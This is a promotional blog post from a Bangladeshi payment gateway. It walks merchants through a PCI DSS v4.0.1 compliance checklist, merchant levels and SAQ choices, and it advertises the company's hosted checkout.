info@moneybag.com.bd +880 1958 109 228
PCI Compliance Audit Checklist for Merchants

PCI Compliance Audit Checklist for Merchants

If your business in Dhaka, Chittagong, Sylhet, Khulna, Rajshahi or anywhere in Bangladesh accepts Visa, Mastercard, American Express or any card payments — whether online, in-app or via payment links — PCI DSS compliance is one of the most important things you need to get right.

In 2026 Bangladesh Bank requires every licensed Payment Service Provider (PSP) and Payment System Operator (PSO) to maintain PCI DSS Level 1 standards. Even small online merchants face real risks if they ignore it:

  • Your gateway can suddenly stop processing cards
  • You can get hit with penalty fees from card brands
  • Chargebacks go up quickly
  • Customers lose trust and stop buying

This simple, step-by-step PCI DSS v4.0.1 checklist is made especially for Bangladeshi e-commerce stores, SaaS platforms, digital services and online sellers. Use it to check your current setup, prepare your SAQ, or work with an auditor.

What PCI DSS Really Means for Merchants in Bangladesh Right Now

PCI DSS (Payment Card Industry Data Security Standard) version 4.0.1 is the current global rule book for keeping cardholder information safe.

The biggest updates that affect you in 2026:

  • Multi-factor authentication (MFA) required for almost all admin access
  • Better protection against malicious scripts on checkout pages
  • More flexible, risk-based rules instead of strict checklists
  • Stronger checks on third-party providers (your gateway must be compliant)

Your merchant level (based on how many card transactions you process per year):

  • Level 4: Less than 20,000 online transactions → easiest SAQ + quarterly scans
  • Level 3: 20,000 to 1 million → SAQ + scans
  • Level 2: 1 million to 6 million → SAQ or full report
  • Level 1: More than 6 million → full audit by a Qualified Security Assessor (QSA)

Most Dhaka and nationwide SMEs fall into Level 4 or Level 3.

Easy-to-Follow PCI DSS Checklist (12 Main Requirements)

1. Build & Maintain a Secure Network

  • Put firewalls in place and keep them updated
  • Separate the part of your system that handles card data from everything else
  • Change all default passwords and settings on routers, firewalls and servers

2. Apply Secure Settings to Every System

  • Turn off or remove anything unnecessary (services, accounts, ports)
  • Harden servers, databases, POS machines and web servers
  • Make sure everything starts securely (secure boot if available)

3. Protect Any Card Data You Store

  • Avoid storing full card numbers (PAN) unless you really need them
  • If you must store, encrypt strongly (AES-256) and manage keys safely
  • When showing card numbers, mask them — only show first 6 and last 4 digits

4. Encrypt Card Data When It Travels

  • Use TLS 1.3 (at least TLS 1.2) for all public internet connections
  • Turn off old/weak versions (SSL, TLS 1.0, TLS 1.1)
  • Encrypt any emails that contain card information (very rare)

5. Protect Against Malware

  • Install anti-malware on every system that touches card data
  • Update it regularly and scan at least weekly
  • Keep virus definitions current

6. Keep Systems & Software Secure

  • Install security patches within one month (critical ones much faster)
  • Follow secure coding rules (OWASP Top 10)
  • Review custom code for security issues

7. Control Who Can See Card Data

  • Only give access to people who need it for their job
  • Review and document who has access every 6 months

8. Identify & Authenticate Users

  • Give every person a unique login ID
  • Require multi-factor authentication (MFA) for all remote and admin access

9. Limit Physical Access

  • Lock server rooms and control who can enter
  • For online-only businesses: physical access is usually very limited

10. Log & Monitor Everything

  • Turn on logging for all important systems
  • Check logs regularly (daily or weekly) for anything unusual

11. Test Security Often

  • Run external vulnerability scans every quarter (use an Approved Scanning Vendor)
  • Do full penetration testing once a year
  • Run internal scans at least every quarter

12. Have Security Policies & Training

  • Write and update a clear security policy
  • Train all staff once a year on card security
  • Check backgrounds of employees who handle card data
  • Have proper contracts with every service provider (including your payment gateway)

Special Tips for Online Stores & SaaS Businesses in Bangladesh

  • Use hosted/redirect checkout (customer leaves your site to pay) → this removes most card data from your servers → you qualify for the easiest SAQ A
  • Never keep full card numbers on your own system — use tokenization instead
  • Make sure your gateway is PCI DSS compliant (Moneybag is Level 1 compliant)
  • Turn on 3D Secure (Verified by Visa / Mastercard SecureCode) for every card transaction

Frequently Asked Questions (Quick Answers)

Is PCI DSS mandatory for every small merchant in Bangladesh?

Not a direct law for tiny shops, but Bangladesh Bank requires it from all payment providers. Your gateway will usually force you to comply or stop card processing.

Which SAQ form should most Dhaka online stores use?

SAQ A (if you use fully hosted/redirect checkout) or SAQ A-EP (direct post). Only use SAQ D if you store or process card data yourself.

How often do I have to run vulnerability scans?

Every quarter for external scans (by an Approved Scanning Vendor) + regular internal scans (at least quarterly, weekly is better for higher risk).

If I use Moneybag, am I automatically PCI compliant?

It reduces your scope a lot (especially with hosted checkout), but you still need to fill out an SAQ, keep policies updated, run scans and train your team.

What happens if I don’t follow PCI rules?

Your gateway can block card payments, card brands can fine you (through the provider), chargebacks rise, and you risk problems under BB regulations.

Next Steps – Make Your Payments Secure Today

PCI DSS compliance protects your customers, your sales and your business in Bangladesh’s growing online economy.

The easiest way to lower your risk is to use a PCI DSS Level 1 compliant gateway that takes care of encryption, tokenization and fraud monitoring for you.

Try Moneybag Sandbox Free — test secure, compliant checkout flows without risk

Join as Merchant — get PCI DSS compliant processing + lowest promo rates

Not sure what your PCI scope looks like or which SAQ to use? Tell me your monthly card transaction volume and which platform you use (WooCommerce, Shopify, custom site, etc.) — I’ll give you the exact next steps.

Stay compliant. Keep customers safe. Grow without worry — Dhaka merchants, secure your card payments today!